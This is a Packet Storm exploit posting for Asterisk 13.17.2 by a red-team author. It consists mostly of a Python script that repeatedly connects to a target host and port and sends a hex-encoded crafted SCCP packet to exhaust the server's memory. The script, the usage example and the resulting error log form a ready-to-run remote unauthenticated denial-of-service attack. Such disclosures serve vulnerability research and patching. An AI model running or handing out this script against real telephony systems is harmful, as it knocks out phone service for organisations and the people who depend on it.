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Asterisk 13.17.2~dfsg-2 Memory Exhaustion

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Asterisk version 13.17.2~dfsg-2 suffers from a remote unauthenticated memory exhaustion vulnerability.

# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team -
http://www.kpn.com
# Date and time of release: Nov, 15 2017
# Found this and more exploits on my open source security project:
http://www.exploitpack.com
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
handles crafted SCCP packet. A remote attacker may be able to exploit
this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit.  It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000

import binascii
import sys
import socket
import time

def asteriskSCCP(target,port):
    try:
        while 1:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Bind port
            s.connect((target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Connected to:"), target, port
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Establishing connection.. ")
            packet =
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')

            # Log the packet in hexa and timestamp
            fileLog = target + ".log"
            logPacket = open(fileLog, "w+")
            logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " -
Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
            logPacket.close()

            # Write bytecodes to socket
            print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
            s.send(bytes(packet))
            # Packet sent:
            print(bytes(packet))
            try:
                data = s.recv(4096)
                print("[" + time.strftime('%a %H:%M:%S') + "]" + " -
"+ "Data received: '{msg}'".format(msg=data))
            except socket.error, e:
                print 'Sorry, No data available'
                continue
        s.close()
    except socket.error as error:
        print error
        print "Sorry, something went wrong!"

def howtouse():
    print "Usage: AsteriskSCCP.py Hostname Port"
    print "[*] Mandatory arguments:"
    print "[-] Specify a hostname / port"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])

        print "[*] Asterisk 13.17 Exploit by Juan Sacco "
        print "[*] Red Team KPN <juan.sacco@kpn.com> "
        asteriskSCCP(target, port)
    except IndexError:
        howtouse()

Source: https://packetstormsecurity.com/files/145149/Asterisk-13.17.2-dfsg-2-Memory-Exhaustion.html

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